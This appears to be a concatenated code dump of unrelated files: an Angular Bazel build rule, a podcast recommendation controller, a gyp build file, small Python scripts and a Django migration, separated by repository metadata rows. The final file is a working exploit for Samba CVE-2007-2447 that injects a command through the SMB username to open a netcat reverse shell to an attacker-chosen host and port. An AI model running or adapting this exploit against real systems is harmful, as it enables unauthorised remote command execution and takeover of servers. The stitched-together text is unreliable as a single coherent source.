        # We need to add a suffix to bundle as it might collide with the flat module dts.
        # The flat module dts out contains several other exports
        # https://github.com/angular/angular/blob/84406e4d6d93b28b23efbb1701bc5ae1084da67b/packages/compiler-cli/src/metadata/index_writer.ts#L18
        # the file name will be like 'core.bundle.d.ts'
        dts_bundles = [ctx.actions.declare_file(ctx.label.name + _FLAT_DTS_FILE_SUFFIX)]
        if _should_produce_r3_symbols_bundle(ctx):
            dts_bundles.append(ctx.actions.declare_file(_R3_SYMBOLS_DTS_FILE.replace(".d.ts", _FLAT_DTS_FILE_SUFFIX)))
    # We do this just when producing a flat module index for a publishable ng_module
    if _should_produce_flat_module_outs(ctx):
        flat_module_out = _flat_module_out_file(ctx)
        devmode_js_files.append(ctx.actions.declare_file("%s.js" % flat_module_out))
        closure_js_files.append(ctx.actions.declare_file("%s.mjs" % flat_module_out))
        bundle_index_typings = ctx.actions.declare_file("%s.d.ts" % flat_module_out)
        declaration_files.append(bundle_index_typings)
        if is_legacy_ngc:
            metadata_files.append(ctx.actions.declare_file("%s.metadata.json" % flat_module_out))
    else:
        bundle_index_typings = None
    # TODO(alxhub): i18n is only produced by the legacy compiler currently. This should be re-enabled
    # when ngtsc can extract messages
    if is_legacy_ngc and _is_bazel():
        i18n_messages_files = [ctx.actions.declare_file(ctx.label.name + "_ngc_messages.xmb")]
    elif is_legacy_ngc:
        # write the xmb file to blaze-genfiles since that path appears in the translation console keys
        i18n_messages_files = [ctx.new_file(ctx.genfiles_dir, ctx.label.name + "_ngc_messages.xmb")]
    else:
        i18n_messages_files = []
    return struct(
        closure_js = closure_js_files,
        devmode_js = devmode_js_files,
        declarations = declaration_files,
        summaries = summary_files,
        metadata = metadata_files,
        dts_bundles = dts_bundles,
        bundle_index_typings = bundle_index_typings,
        i18n_messages = i18n_messages_files,
    )
# Determines if we need to generate View Engine shims (.ngfactory and .ngsummary files)
def _generate_ve_shims(ctx):
    # we are checking the workspace name here, because otherwise this would be a breaking change
    # (the shims used to be on by default)
    # we can remove this check once angular/components and angular/angular-cli repos no longer depend
    # on the presence of shims, or if they explicitly opt-in to their generation via ng_modules' generate_ve_shims attr
    # Shims are produced for: Bazel + ViewEngine builds, explicit opt-in, or
    # any workspace other than "angular" itself (back-compat default).
    return _is_bazel() and _is_view_engine_enabled(ctx) or (
        getattr(ctx.attr, "generate_ve_shims", False) == True or ctx.workspace_name != "angular"
    )
def _ngc_tsconfig(ctx, files, srcs, **kwargs):
    """Builds the tsconfig dict passed to ngc, extending the ts_library tsconfig
    with an "angularCompilerOptions" section.

    Args:
      ctx: skylark rule execution context
      files: input files for the compilation
      srcs: source files for the compilation
      **kwargs: forwarded to tsc_wrapped_tsconfig; the presence of
        "devmode_manifest" selects devmode vs prodmode expected outputs
    Returns:
      a tsconfig dict
    """
    generate_ve_shims = _generate_ve_shims(ctx)
    outs = _expected_outs(ctx)
    is_legacy_ngc = _is_view_engine_enabled(ctx)
    if "devmode_manifest" in kwargs:
        expected_outs = outs.devmode_js + outs.declarations + outs.summaries + outs.metadata
    else:
        expected_outs = outs.closure_js
    angular_compiler_options = {
        "enableResourceInlining": ctx.attr.inline_resources,
        "generateCodeForLibraries": False,
        "allowEmptyCodegenFiles": True,
        "generateNgFactoryShims": True if generate_ve_shims else False,
        "generateNgSummaryShims": True if generate_ve_shims else False,
        # Summaries are only enabled if Angular outputs are to be produced.
        "enableSummariesForJit": is_legacy_ngc,
        "enableIvy": is_ivy_enabled(ctx),
        "fullTemplateTypeCheck": ctx.attr.type_check,
        # In Google3 we still want to use the symbol factory re-exports in order to
        # not break existing apps inside Google. Unlike Bazel, Google3 does not only
        # enforce strict dependencies of source files, but also for generated files
        # (such as the factory files). Therefore in order to avoid that generated files
        # introduce new module dependencies (which aren't explicitly declared), we need
        # to enable external symbol re-exports by default when running with Blaze.
        "createExternalSymbolFactoryReexports": (not _is_bazel()),
        # FIXME: wrong place to de-dupe
        "expectedOut": depset([o.path for o in expected_outs]).to_list(),
        "_useHostForImportGeneration": (not _is_bazel()),
    }
    if _should_produce_flat_module_outs(ctx):
        angular_compiler_options["flatModuleId"] = ctx.attr.module_name
        angular_compiler_options["flatModuleOutFile"] = _flat_module_out_file(ctx)
        angular_compiler_options["flatModulePrivateSymbolPrefix"] = "_".join(
            [ctx.workspace_name] + ctx.label.package.split("/") + [ctx.label.name, ""],
        )
    return dict(tsc_wrapped_tsconfig(ctx, files, srcs, **kwargs), **{
        "angularCompilerOptions": angular_compiler_options,
    })
def _collect_summaries_aspect_impl(target, ctx):
    """Aspect implementation that gathers Angular summary files transitively over deps."""
    results = depset(target.angular.summaries if hasattr(target, "angular") else [])
    # If we are visiting empty-srcs ts_library, this is a re-export
    srcs = ctx.rule.attr.srcs if hasattr(ctx.rule.attr, "srcs") else []
    # "re-export" rules should expose all the files of their deps
    if not srcs and hasattr(ctx.rule.attr, "deps"):
        for dep in ctx.rule.attr.deps:
            if (hasattr(dep, "angular")):
                results = depset(dep.angular.summaries, transitive = [results])
    return struct(collect_summaries_aspect_result = results)
# Aspect applied along the "deps" edges of ng_module targets (see NG_MODULE_ATTRIBUTES).
_collect_summaries_aspect = aspect(
    implementation = _collect_summaries_aspect_impl,
    attr_aspects = ["deps"],
)
# Extra options passed to Node when running ngc.
# Each entry is a --node_options flag consumed by the nodejs launcher wrapping ngc.
_EXTRA_NODE_OPTIONS_FLAGS = [
    # Expose the v8 garbage collection API to JS.
    "--node_options=--expose-gc",
    # Show ~full stack traces, instead of cutting off after 10 items.
    "--node_options=--stack-trace-limit=100",
    # Give 4 GB RAM to node to allow bigger google3 modules to compile.
    "--node_options=--max-old-space-size=4096",
]
def ngc_compile_action(
        ctx,
        label,
        inputs,
        outputs,
        messages_out,
        tsconfig_file,
        node_opts,
        locale = None,
        i18n_args = [],
        dts_bundles_out = None,
        compile_mode = "prodmode"):
    """Helper function to create the ngc action.
    This is exposed for google3 to wire up i18n replay rules, and is not intended
    as part of the public API.
    Args:
      ctx: skylark context
      label: the label of the ng_module being compiled
      inputs: passed to the ngc action's inputs
      outputs: passed to the ngc action's outputs
      messages_out: produced xmb files
      tsconfig_file: tsconfig file with settings used for the compilation
      node_opts: list of strings, extra nodejs options.
      locale: i18n locale, or None
      i18n_args: additional command-line arguments to ngc
      dts_bundles_out: produced flattened dts file
      compile_mode: label for progress messages ("prodmode" or "devmode")
    Returns:
      the parameters of the compilation which will be used to replay the ngc action for i18N.
    """
    is_legacy_ngc = _is_view_engine_enabled(ctx)
    mnemonic = "AngularTemplateCompile"
    progress_message = "Compiling Angular templates (%s - %s) %s" % (_compiler_name(ctx), compile_mode, label)
    if locale:
        mnemonic = "AngularI18NMerging"
        # i18n merging cannot use persistent workers.
        supports_workers = "0"
        progress_message = ("Recompiling Angular templates (ngc - %s) %s for locale %s" %
                            (compile_mode, label, locale))
    else:
        supports_workers = str(int(ctx.attr._supports_workers))
    arguments = (list(_EXTRA_NODE_OPTIONS_FLAGS) +
                 ["--node_options=%s" % opt for opt in node_opts])
    # One at-sign makes this a params-file, enabling the worker strategy.
    # Two at-signs escapes the argument so it's passed through to ngc
    # rather than the contents getting expanded.
    if supports_workers == "1":
        arguments += ["@@" + tsconfig_file.path]
    else:
        arguments += ["-p", tsconfig_file.path]
    arguments += i18n_args
    ctx.actions.run(
        progress_message = progress_message,
        mnemonic = mnemonic,
        inputs = inputs,
        outputs = outputs,
        arguments = arguments,
        executable = ctx.executable.compiler,
        execution_requirements = {
            "supports-workers": supports_workers,
        },
    )
    # View Engine only: extract translation messages into an .xmb file.
    if is_legacy_ngc and messages_out != None:
        # The base path is bin_dir because of the way the ngc
        # compiler host is configured. Under Blaze, we need to explicitly
        # point to genfiles/ to redirect the output.
        # See _expected_outs above, where the output path for the message file
        # is conditional on whether we are in Bazel.
        message_file_path = messages_out[0].short_path if _is_bazel() else "../genfiles/" + messages_out[0].short_path
        ctx.actions.run(
            inputs = inputs,
            outputs = messages_out,
            executable = ctx.executable.ng_xi18n,
            arguments = (_EXTRA_NODE_OPTIONS_FLAGS +
                         [tsconfig_file.path] +
                         [message_file_path]),
            progress_message = "Extracting Angular 2 messages (ng_xi18n)",
            mnemonic = "Angular2MessageExtractor",
        )
    # Optionally run the API extractor to produce flattened .bundle.d.ts files.
    if dts_bundles_out != None:
        # combine the inputs and outputs and filter .d.ts and json files
        filter_inputs = [f for f in inputs.to_list() + outputs if f.path.endswith(".d.ts") or f.path.endswith(".json")]
        if _should_produce_flat_module_outs(ctx):
            dts_entry_points = ["%s.d.ts" % _flat_module_out_file(ctx)]
        else:
            dts_entry_points = [ctx.attr.entry_point.label.name.replace(".ts", ".d.ts")]
        if _should_produce_r3_symbols_bundle(ctx):
            dts_entry_points.append(_R3_SYMBOLS_DTS_FILE)
        ctx.actions.run(
            progress_message = "Bundling DTS (%s) %s" % (compile_mode, str(ctx.label)),
            mnemonic = "APIExtractor",
            executable = ctx.executable.api_extractor,
            inputs = filter_inputs,
            outputs = dts_bundles_out,
            arguments = [
                tsconfig_file.path,
                ",".join(["/".join([ctx.bin_dir.path, ctx.label.package, f]) for f in dts_entry_points]),
                ",".join([f.path for f in dts_bundles_out]),
            ],
        )
    # Return the replay parameters only for the primary (non-locale) compile.
    if not locale and not ctx.attr.no_i18n:
        return struct(
            label = label,
            tsconfig = tsconfig_file,
            inputs = inputs,
            outputs = outputs,
            compiler = ctx.executable.compiler,
        )
    return None
def _filter_ts_inputs(all_inputs):
    # The compiler only needs to see TypeScript sources from the npm dependencies,
    # but may need to look at package.json and ngsummary.json files as well.
    filtered = []
    for f in all_inputs:
        path = f.path
        if path.endswith(".js") or path.endswith(".ts") or path.endswith(".json"):
            filtered.append(f)
    return filtered
def _compile_action(
        ctx,
        inputs,
        outputs,
        dts_bundles_out,
        messages_out,
        tsconfig_file,
        node_opts,
        compile_mode):
    """Assembles the full input set for ngc and dispatches to ngc_compile_action."""
    # Give the Angular compiler all the user-listed assets
    file_inputs = list(ctx.files.assets)
    if (type(inputs) == type([])):
        file_inputs.extend(inputs)
    else:
        # inputs ought to be a list, but allow depset as well
        # so that this can change independently of rules_typescript
        # TODO(alexeagle): remove this case after update (July 2019)
        file_inputs.extend(inputs.to_list())
    if hasattr(ctx.attr, "node_modules"):
        file_inputs.extend(_filter_ts_inputs(ctx.files.node_modules))
    # If the user supplies a tsconfig.json file, the Angular compiler needs to read it
    if hasattr(ctx.attr, "tsconfig") and ctx.file.tsconfig:
        file_inputs.append(ctx.file.tsconfig)
        if TsConfigInfo in ctx.attr.tsconfig:
            file_inputs += ctx.attr.tsconfig[TsConfigInfo].deps
    # Also include files from npm fine grained deps as action_inputs.
    # These deps are identified by the NpmPackageInfo provider.
    for d in ctx.attr.deps:
        if NpmPackageInfo in d:
            # Note: we can't avoid calling .to_list() on sources
            file_inputs.extend(_filter_ts_inputs(d[NpmPackageInfo].sources.to_list()))
    # Collect the inputs and summary files from our deps
    action_inputs = depset(
        file_inputs,
        transitive = [
            dep.collect_summaries_aspect_result
            for dep in ctx.attr.deps
            if hasattr(dep, "collect_summaries_aspect_result")
        ],
    )
    return ngc_compile_action(ctx, ctx.label, action_inputs, outputs, messages_out, tsconfig_file, node_opts, None, [], dts_bundles_out, compile_mode)
def _prodmode_compile_action(ctx, inputs, outputs, tsconfig_file, node_opts):
    # Prodmode: ES-module (.mjs) outputs; i18n message extraction happens here.
    outs = _expected_outs(ctx)
    return _compile_action(ctx, inputs, outputs + outs.closure_js, None, outs.i18n_messages, tsconfig_file, node_opts, "prodmode")
def _devmode_compile_action(ctx, inputs, outputs, tsconfig_file, node_opts):
    # Devmode: .js outputs plus declarations/summaries/metadata and dts bundles.
    outs = _expected_outs(ctx)
    compile_action_outputs = outputs + outs.devmode_js + outs.declarations + outs.summaries + outs.metadata
    _compile_action(ctx, inputs, compile_action_outputs, outs.dts_bundles, None, tsconfig_file, node_opts, "devmode")
def _ts_expected_outs(ctx, label, srcs_files = []):
    # rules_typescript expects a function with two or more arguments, but our
    # implementation doesn't use the label(and **kwargs).
    _ignored = [label, srcs_files]
    return _expected_outs(ctx)
def ng_module_impl(ctx, ts_compile_actions):
    """Implementation function for the ng_module rule.
    This is exposed so that google3 can have its own entry point that re-uses this
    and is not meant as a public API.
    Args:
      ctx: the skylark rule context
      ts_compile_actions: generates all the actions to run an ngc compilation
    Returns:
      the result of the ng_module rule as a dict, suitable for
      conversion by ts_providers_dict_to_struct
    """
    is_legacy_ngc = _is_view_engine_enabled(ctx)
    providers = ts_compile_actions(
        ctx,
        is_library = True,
        compile_action = _prodmode_compile_action,
        devmode_compile_action = _devmode_compile_action,
        tsc_wrapped_tsconfig = _ngc_tsconfig,
        outputs = _ts_expected_outs,
    )
    outs = _expected_outs(ctx)
    # Summaries/metadata/xmb messages are View Engine-only artifacts.
    if is_legacy_ngc:
        providers["angular"] = {
            "summaries": outs.summaries,
            "metadata": outs.metadata,
        }
        providers["ngc_messages"] = outs.i18n_messages
    if is_legacy_ngc and _should_produce_flat_module_outs(ctx):
        if len(outs.metadata) > 1:
            fail("expecting exactly one metadata output for " + str(ctx.label))
        providers["angular"]["flat_module_metadata"] = struct(
            module_name = ctx.attr.module_name,
            metadata_file = outs.metadata[0],
            typings_file = outs.bundle_index_typings,
            flat_module_out_file = _flat_module_out_file(ctx),
        )
    if outs.dts_bundles != None:
        providers["dts_bundles"] = outs.dts_bundles
    return providers
def _ng_module_impl(ctx):
    """Rule implementation: runs ng_module_impl and attaches the shared JS providers."""
    ts_providers = ng_module_impl(ctx, compile_ts)
    # Add in new JS providers
    # See design doc https://docs.google.com/document/d/1ggkY5RqUkVL4aQLYm7esRW978LgX3GUCnQirrk5E1C0/edit#
    # and issue https://github.com/bazelbuild/rules_nodejs/issues/57 for more details.
    ts_providers["providers"].extend([
        js_named_module_info(
            sources = ts_providers["typescript"]["es5_sources"],
            deps = ctx.attr.deps,
        ),
        js_ecma_script_module_info(
            sources = ts_providers["typescript"]["es6_sources"],
            deps = ctx.attr.deps,
        ),
        # TODO: Add remaining shared JS providers from design doc
        # (JSModuleInfo) and remove legacy "typescript" provider
        # once it is no longer needed.
    ])
    return ts_providers_dict_to_struct(ts_providers)
local_deps_aspects = [node_modules_aspect, _collect_summaries_aspect]
# Workaround skydoc bug which assumes DEPS_ASPECTS is a str type
# NOTE(review): the list-comprehension-for-side-effect below is presumably part
# of that workaround (avoiding list concatenation skydoc can't parse) -- confirm
# before simplifying to extend().
[local_deps_aspects.append(a) for a in DEPS_ASPECTS]
# Attributes shared by the open-source ng_module rule and google3's variant.
NG_MODULE_ATTRIBUTES = {
    "srcs": attr.label_list(allow_files = [".ts"]),
    # Note: DEPS_ASPECTS is already a list, we add the cast to workaround
    # https://github.com/bazelbuild/skydoc/issues/21
    "deps": attr.label_list(
        doc = "Targets that are imported by this target",
        aspects = local_deps_aspects,
    ),
    "assets": attr.label_list(
        doc = ".html and .css files needed by the Angular compiler",
        allow_files = [
            ".css",
            # TODO(alexeagle): change this to ".ng.html" when usages updated
            ".html",
        ],
    ),
    "factories": attr.label_list(
        allow_files = [".ts", ".html"],
        mandatory = False,
    ),
    "filter_summaries": attr.bool(default = False),
    "type_check": attr.bool(default = True),
    "inline_resources": attr.bool(default = True),
    "no_i18n": attr.bool(default = False),
    "compiler": attr.label(
        doc = """Sets a different ngc compiler binary to use for this library.
        The default ngc compiler depends on the `@npm//@angular/bazel`
        target which is setup for projects that use bazel managed npm deps that
        fetch the @angular/bazel npm package. It is recommended that you use
        the workspace name `@npm` for bazel managed deps so the default
        compiler works out of the box. Otherwise, you'll have to override
        the compiler attribute manually.
        """,
        default = Label(DEFAULT_NG_COMPILER),
        executable = True,
        cfg = "host",
    ),
    "ng_xi18n": attr.label(
        default = Label(DEFAULT_NG_XI18N),
        executable = True,
        cfg = "host",
    ),
    # Private: whether the compiler supports Bazel persistent workers.
    "_supports_workers": attr.bool(default = True),
}
# Full attribute set of the open-source ng_module rule: common ts_library
# attributes, plus NG_MODULE_ATTRIBUTES, plus the Bazel-only attributes below.
NG_MODULE_RULE_ATTRS = dict(dict(COMMON_ATTRIBUTES, **NG_MODULE_ATTRIBUTES), **{
    "tsconfig": attr.label(allow_single_file = True),
    "node_modules": attr.label(
        doc = """The npm packages which should be available during the compile.
        The default value of `@npm//typescript:typescript__typings` is
        for projects that use bazel managed npm deps. It is recommended
        that you use the workspace name `@npm` for bazel managed deps so the
        default value works out of the box. Otherwise, you'll have to
        override the node_modules attribute manually. This default is in place
        since code compiled by ng_module will always depend on at least the
        typescript default libs which are provided by
        `@npm//typescript:typescript__typings`.
        This attribute is DEPRECATED. As of version 0.18.0 the recommended
        approach to npm dependencies is to use fine grained npm dependencies
        which are setup with the `yarn_install` or `npm_install` rules.
        For example, in targets that used a `//:node_modules` filegroup,
        ```
        ng_module(
          name = "my_lib",
          ...
          node_modules = "//:node_modules",
        )
        ```
        which specifies all files within the `//:node_modules` filegroup
        to be inputs to the `my_lib`. Using fine grained npm dependencies,
        `my_lib` is defined with only the npm dependencies that are
        needed:
        ```
        ng_module(
          name = "my_lib",
          ...
          deps = [
              "@npm//@types/foo",
              "@npm//@types/bar",
              "@npm//foo",
              "@npm//bar",
              ...
          ],
        )
        ```
        In this case, only the listed npm packages and their
        transitive deps are includes as inputs to the `my_lib` target
        which reduces the time required to setup the runfiles for this
        target (see https://github.com/bazelbuild/bazel/issues/5153).
        The default typescript libs are also available via the node_modules
        default in this case.
        The @npm external repository and the fine grained npm package
        targets are setup using the `yarn_install` or `npm_install` rule
        in your WORKSPACE file:
        yarn_install(
          name = "npm",
          package_json = "//:package.json",
          yarn_lock = "//:yarn.lock",
        )
        """,
        default = Label("@npm//typescript:typescript__typings"),
    ),
    "entry_point": attr.label(allow_single_file = True),
    # Default is %{name}_public_index
    # The suffix points to the generated "bundle index" files that users import from
    # The default is intended to avoid collisions with the users input files.
    # Later packaging rules will point to these generated files as the entry point
    # into the package.
    # See the flatModuleOutFile documentation in
    # https://github.com/angular/angular/blob/master/packages/compiler-cli/src/transformers/api.ts
    "flat_module_out_file": attr.string(),
    "bundle_dts": attr.bool(default = False),
    "api_extractor": attr.label(
        default = Label(DEFAULT_API_EXTRACTOR),
        executable = True,
        cfg = "host",
    ),
    # Should the rule generate ngfactory and ngsummary shim files?
    "generate_ve_shims": attr.bool(default = False),
})
# The raw rule; users normally reach it through ng_module_macro below.
ng_module = rule(
    implementation = _ng_module_impl,
    attrs = NG_MODULE_RULE_ATTRS,
    outputs = COMMON_OUTPUTS,
)
# The trailing string literal is the rule's documentation, picked up by
# skydoc/stardoc.
"""
Run the Angular AOT template compiler.
This rule extends the [ts_library] rule.
[ts_library]: http://tsetse.info/api/build_defs.html#ts_library
"""
def ng_module_macro(tsconfig = None, **kwargs):
    """Macro wrapper around `ng_module` that supplies a default `tsconfig`.

    Resolving the default here — in a macro rather than in the rule — makes
    the string "//:tsconfig.json" a label relative to the workspace that
    declares the `ng_module` target, not the workspace that defines
    `ng_module` or the one where the build runs.
    This macro is re-exported as `ng_module` in the public API.

    Args:
      tsconfig: the label pointing to a tsconfig.json file
      **kwargs: remaining args to pass to the ng_module rule
    """
    ng_module(tsconfig = tsconfig or "//:tsconfig.json", **kwargs)
| 38.864831 | 161 | 0.662867 |
5f57e5922e8612a59e84b62f54d4c5637eff5f20 | 395 | py | Python | podcast-ml/service/src/app/podcastml/controllers/recommend_episodes_for_topic_controller.py | cuappdev/archives | 061d0f9cccf278363ffaeb27fc655743b1052ae5 | [
"MIT"
] | null | null | null | podcast-ml/service/src/app/podcastml/controllers/recommend_episodes_for_topic_controller.py | cuappdev/archives | 061d0f9cccf278363ffaeb27fc655743b1052ae5 | [
"MIT"
] | null | null | null | podcast-ml/service/src/app/podcastml/controllers/recommend_episodes_for_topic_controller.py | cuappdev/archives | 061d0f9cccf278363ffaeb27fc655743b1052ae5 | [
"MIT"
] | null | null | null | from . import *
class RecommendEpisodesForTopicController(AppDevController):
    """GET endpoint that returns recommended episode ids for one topic."""

    def get_path(self):
        """Route pattern served by this controller."""
        return '/episodes/topic/<topic_id>/'

    def get_methods(self):
        """HTTP verbs accepted on the route."""
        return ['GET']

    @authorize
    def content(self, **kwargs):
        """Look up the recommended episodes for the topic named in the URL."""
        topic = request.view_args['topic_id']
        recommended = episodes_for_topic_dao.get_episode_list_for_topic(topic)
        return {'episode_ids': recommended}
| 24.6875 | 77 | 0.736709 |
bbc475b2076d52f743a63c21f455aebb740d8f3f | 4,416 | gyp | Python | Mozc-for-iOS/src/ipc/ipc.gyp | spanfish/JapaneseKeyboard | 84fa7ef799d145fb9897b6e86bc7bc50610ccb2b | [
"Apache-2.0"
] | 33 | 2015-01-21T09:50:21.000Z | 2022-02-12T15:18:25.000Z | src/ipc/ipc.gyp | kishikawakatsumi/Mozc-for-iOS | 45b0856ed8a22d5fa6b4471548389cbde4abcf10 | [
"Apache-2.0"
] | 1 | 2015-05-12T06:26:54.000Z | 2017-11-01T14:43:35.000Z | Mozc-for-iOS/src/ipc/ipc.gyp | spanfish/JapaneseKeyboard | 84fa7ef799d145fb9897b6e86bc7bc50610ccb2b | [
"Apache-2.0"
] | 8 | 2015-06-08T15:57:25.000Z | 2019-05-15T08:52:58.000Z | # Copyright 2010-2014, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{
'variables': {
'relative_dir': 'ipc',
},
'targets': [
{
'target_name': 'ipc',
'type': 'static_library',
'sources': [
'android_ipc.cc',
'ipc.cc',
'ipc_mock.cc',
'ipc_path_manager.cc',
'mach_ipc.cc',
'named_event.cc',
'process_watch_dog.cc',
'unix_ipc.cc',
'win32_ipc.cc',
],
'dependencies': [
'../base/base.gyp:base',
'ipc_protocol',
],
'conditions': [
['target_platform=="Android"', {
'sources!': [
'ipc_path_manager.cc',
'process_watch_dog.cc',
],
}],
],
},
{
'target_name': 'ipc_protocol',
'type': 'static_library',
'hard_dependency': 1,
'sources': [
'<(proto_out_dir)/<(relative_dir)/ipc.pb.cc',
],
'dependencies': [
'../protobuf/protobuf.gyp:protobuf',
'genproto_ipc#host',
],
'export_dependent_settings': [
'genproto_ipc#host',
],
},
{
'target_name': 'genproto_ipc',
'type': 'none',
'toolsets': ['host'],
'sources': [
'ipc.proto',
],
'includes': [
'../protobuf/genproto.gypi',
],
},
{
'target_name': 'window_info_protocol',
'type': 'static_library',
'hard_dependency': 1,
'sources': [
'<(proto_out_dir)/<(relative_dir)/window_info.pb.cc',
],
'dependencies': [
'../protobuf/protobuf.gyp:protobuf',
'genproto_window_info#host',
],
'export_dependent_settings': [
'genproto_window_info#host',
],
},
{
'target_name': 'genproto_window_info',
'type': 'none',
'toolsets': ['host'],
'sources': [
'window_info.proto',
],
'includes': [
'../protobuf/genproto.gypi',
],
},
{
'target_name': 'ipc_test_util',
'type': 'static_library',
'sources': [
'ipc_test_util.cc',
],
'dependencies': [
'../base/base.gyp:base',
'ipc',
],
},
{
'target_name': 'ipc_test',
'type': 'executable',
'sources': [
'ipc_path_manager_test.cc',
'ipc_test.cc',
'named_event_test.cc',
'process_watch_dog_test.cc',
],
'dependencies': [
'../testing/testing.gyp:gtest_main',
'ipc',
'ipc_test_util',
],
'variables': {
'test_size': 'small',
},
},
# Test cases meta target: this target is referred from gyp/tests.gyp
{
'target_name': 'ipc_all_test',
'type': 'none',
'dependencies': [
'ipc_test',
],
'conditions': [
['target_platform=="Android"', {
# Android tests nothing.
'dependencies=': []
}],
],
},
],
}
| 27.773585 | 72 | 0.578125 |
0374b112cf62737de3ecded31c937ad26ccd7990 | 276 | py | Python | docs/API/Users_Guide/scripts/Basic_Troubleshooting.py | ZhenyuZ/gdc-docs | f024d5d4cd86dfa2c9e7d63850eee94d975b7948 | [
"Apache-2.0"
] | null | null | null | docs/API/Users_Guide/scripts/Basic_Troubleshooting.py | ZhenyuZ/gdc-docs | f024d5d4cd86dfa2c9e7d63850eee94d975b7948 | [
"Apache-2.0"
] | null | null | null | docs/API/Users_Guide/scripts/Basic_Troubleshooting.py | ZhenyuZ/gdc-docs | f024d5d4cd86dfa2c9e7d63850eee94d975b7948 | [
"Apache-2.0"
] | null | null | null | import requests
status_endpt = "https://api.gdc.cancer.gov/status"
response = requests.get(status_endpt)
# OUTPUT METHOD 1: Write to a file.
# Use a context manager so the handle is closed even if write() raises,
# and avoid shadowing the `file` builtin.
with open("api_status.json", "w") as out_file:
    out_file.write(response.text)
# OUTPUT METHOD 2: View on screen.
print(response.content) | 25.090909 | 50 | 0.746377 |
5bf139de1fd12efca36c46bef4bc162f6da33430 | 761 | py | Python | whiteboard/migrations/0006_lift_user.py | DanSparkes/Whiteboard | d084c3513d876fdbba092eae21c3a3fabd6d51da | [
"MIT"
] | 1 | 2019-11-11T17:02:12.000Z | 2019-11-11T17:02:12.000Z | whiteboard/migrations/0006_lift_user.py | DanSparkes/Whiteboard | d084c3513d876fdbba092eae21c3a3fabd6d51da | [
"MIT"
] | 17 | 2019-12-05T02:07:59.000Z | 2022-02-03T12:59:06.000Z | whiteboard/migrations/0006_lift_user.py | DanSparkes/Whiteboard | d084c3513d876fdbba092eae21c3a3fabd6d51da | [
"MIT"
] | 1 | 2019-11-16T17:25:40.000Z | 2019-11-16T17:25:40.000Z | # Generated by Django 2.2.6 on 2019-11-11 20:06
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.6 (see the header comment above); adds a
    # required owning "user" foreign key to the Lift model.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("whiteboard", "0005_auto_20191109_2046"),
    ]
    operations = [
        migrations.AddField(
            model_name="lift",
            name="user",
            field=models.ForeignKey(
                # default=1 backfills existing rows; the default is then
                # dropped again via preserve_default=False below.
                default=1,
                on_delete=django.db.models.deletion.CASCADE,
                related_name="lifts",
                to=settings.AUTH_USER_MODEL,
                verbose_name="User",
            ),
            preserve_default=False,
        ),
    ]
| 26.241379 | 66 | 0.592641 |
a5ac15dd4d1459628946139f4ac9c7aa7635f56c | 195 | py | Python | python/const.py | tribbloid/convnet-abstraction | 8827c1dd8b19462bd0499cd0a8d81a8688e7fc48 | [
"Apache-2.0"
] | 5 | 2019-02-11T20:39:05.000Z | 2022-01-11T13:25:45.000Z | python/const.py | tribbloid/convnet-abstraction | 8827c1dd8b19462bd0499cd0a8d81a8688e7fc48 | [
"Apache-2.0"
] | null | null | null | python/const.py | tribbloid/convnet-abstraction | 8827c1dd8b19462bd0499cd0a8d81a8688e7fc48 | [
"Apache-2.0"
] | 1 | 2019-06-29T11:45:30.000Z | 2019-06-29T11:45:30.000Z | import matplotlib.pyplot as plt
import mxnet as mx
CTX = mx.gpu() if mx.test_utils.list_gpus() else mx.cpu()
# print(f"=== MXNet is using {CTX} ===")
MODEL_CHKPNT: str = ".model_checkpoints"
| 19.5 | 57 | 0.692308 |
83388b308770b2e3d7900978aa24947b446fb35c | 1,113 | py | Python | samba-exploit.py | ozuma/CVE-2007-2447 | b8573030e7e34942f477928576256162fd22beff | [
"MIT"
] | 2 | 2021-03-28T16:23:21.000Z | 2021-11-16T01:47:09.000Z | samba-exploit.py | ozuma/CVE-2007-2447 | b8573030e7e34942f477928576256162fd22beff | [
"MIT"
] | null | null | null | samba-exploit.py | ozuma/CVE-2007-2447 | b8573030e7e34942f477928576256162fd22beff | [
"MIT"
] | 2 | 2021-03-28T16:23:23.000Z | 2021-11-16T01:47:09.000Z | #!/usr/bin/python3
# Ref: https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py
# Ref: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
# Product: Samba
# Vuln: CVE-2007-2447
# Exploit-DB: https://www.exploit-db.com/exploits/16320
#
# install: pip3 install pysmb
import sys
import platform
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
    """Trigger CVE-2007-2447 by logging in with a shell-injecting username.

    The Samba "username map script" option passes the username to a shell,
    so a backtick-wrapped payload in the username spawns a reverse shell
    back to lhost:lport.
    """
    reverse_shell = f'mkfifo /tmp/f; nc {lhost} {lport} 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f'
    crafted_username = f"/=`nohup {reverse_shell}`"
    connection = SMBConnection(crafted_username, "", "", "")
    connection.connect(rhost, int(rport))
